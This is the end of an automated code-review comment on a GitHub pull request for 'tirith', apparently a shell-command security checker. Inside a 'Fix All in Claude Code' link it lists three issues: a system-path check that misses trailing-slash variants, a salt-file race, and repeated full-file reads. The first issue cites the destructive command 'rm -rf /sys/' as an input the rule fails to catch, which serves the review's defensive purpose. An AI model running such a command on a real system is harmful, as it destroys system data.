<a href="https://app.greptile.com/ide/claude-code?prompt=Fix%20the%20following%203%20code%20review%20issues.%20Work%20through%20them%20one%20at%20a%20time%2C%20proposing%20concise%20fixes.%0A%0A---%0A%0A%23%23%23%20Issue%201%20of%203%0Acrates%2Ftirith-core%2Fsrc%2Fblast_radius.rs%3A537-550%0A**Missing%20trailing-slash%20variants%20for%20%60%2Fsys%2F%60%2C%20%60%2Fproc%2F%60%2C%20%60%2Fdev%2F%60**%0A%0A%60is_system_path%60%20includes%20%60%2Fsys%60%2C%20%60%2Fproc%60%2C%20and%20%60%2Fdev%60%20in%20the%20bare-path%20match%2C%20but%20they%20are%20absent%20from%20the%20trailing-slash%20variants%20below.%20A%20command%20like%20%60rm%20-rf%20%2Fsys%2F%60%20passes%20the%20%60p.trim%28%29%60%20step%20as%20%60%22%2Fsys%2F%22%60%2C%20which%20matches%20neither%20block%20%E2%80%94%20the%20rule%20silently%20misses%20it.%20The%20same%20gap%20exists%20for%20%60%2Fproc%2F%60%20and%20%60%2Fdev%2F%60.%20All%20other%20paths%20in%20the%20bare%20list%20%28%60%2Fhome%60%2C%20%60%2Fusr%60%2C%20%60%2Fetc%60%2C%20etc.%29%20have%20trailing-slash%20entries%3B%20these%20three%20are%20the%20exception.%0A%0A%23%23%23%20Issue%202%20of%203%0Acrates%2Ftirith-core%2Fsrc%2Fbaseline.rs%3A196-214%0A**Salt%20file%20race%3A%20%60truncate%28true%29%60%20corrupts%20in-flight%20observations**%0A%0AWhen%20two%20%60tirith%60%20processes%20start%20simultaneously%20and%20both%20find%20the%20salt%20file%20absent%2C%20both%20generate%20independent%20salts%20and%20both%20reach%20this%20%60OpenOptions%60%20block.%20Because%20the%20options%20include%20%60write%28true%29.truncate%28true%29%60%20%28not%20%60create_new%60%29%2C%20whichever%20process%20writes%20second%20silently%20overwrites%20the%20salt%20the%20first%20process%20already%20wrote.%20The%20first%20process%20then%20has%20salt_A%20in%20memory%20but%20salt_B%20on%20disk%3B%20any%20observations%20it%20appended%20%28with%20salt_A%20hashes%29%20can%20never%20be%20matched%20by%20a%20future%20lookup%20that%20reads%20salt_B%20from%20the%20file.%20The%20result%20is%20that%20those%20observations%20permanently%20look%20%22first-time%22%20%E2%80%94%20but%20%60create_new%28true%29%60%20%28falling%20back%20to%20the%20in-memory%20salt%20if%20the%20file%20already%20appeared%29%20achieves%20the%20same%20fail-open%20behaviour%20without%20corrupting%20what%20another%20concurrent%20process%20wrote.%0A%0A%23%23%23%20Issue%203%20of%203%0Acrates%2Ftirith-core%2Fsrc%2Fengine.rs%3A1%0A**%60apply_baseline%60%3A%20N%20full-store%20reads%20per%20analysis**%0A%0AInside%20%60apply_baseline%60%2C%20every%20distinct%20finding%20tuple%20calls%20%60crate%3A%3Abaseline%3A%3Alookup%28%26key%29%60%2C%20and%20each%20%60lookup%60%20invocation%20calls%20%60lookup_at%60%2C%20which%20opens%20and%20linearly%20scans%20the%20entire%20JSONL%20store.%20With%20N%20firing%20findings%20per%20command%20and%20up%20to%20100k%20lines%20in%20the%20store%2C%20a%20single%20%60tirith%20check%60%20call%20when%20baseline%20is%20enabled%20performs%20N%20%C3%97%20full-file%20reads%20%28plus%20N%20%60record%60%20calls%2C%20each%20doing%20another%20read%20for%20%60line_count%60%29.%20Loading%20the%20store%20once%20at%20the%20top%20of%20%60apply_baseline%60%20and%20reusing%20the%20parsed%20%60Vec%3CObservation%3E%60%20for%20all%20lookups%20would%20reduce%20this%20to%20a%20single%20read%20per%20analysis.%0A%0A&repo=sheeki03%2Ftirith&pr=129&platform=github"><picture><source media="(prefers-color-scheme: dark)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInClaudeDark.svg?v=3"><source media="(prefers-color-scheme: light)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInClaude.svg?v=3"><img alt="Fix All in Claude Code" src="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInClaude.svg?v=3" height="20"></picture></a>

<sub>Reviews (2): Last reviewed commit: ["feat(temp-run): tirith temp-run file-iso..."](https://github.com/sheeki03/tirith/commit/1a5e5accf2d1a25159c05f1051c23438e0fe6b3c) | [Re-trigger Greptile](https://app.greptile.com/api/retrigger?id=34335001)</sub>

> Greptile also left **2 inline comments** on this PR.

<!-- /greptile_comment -->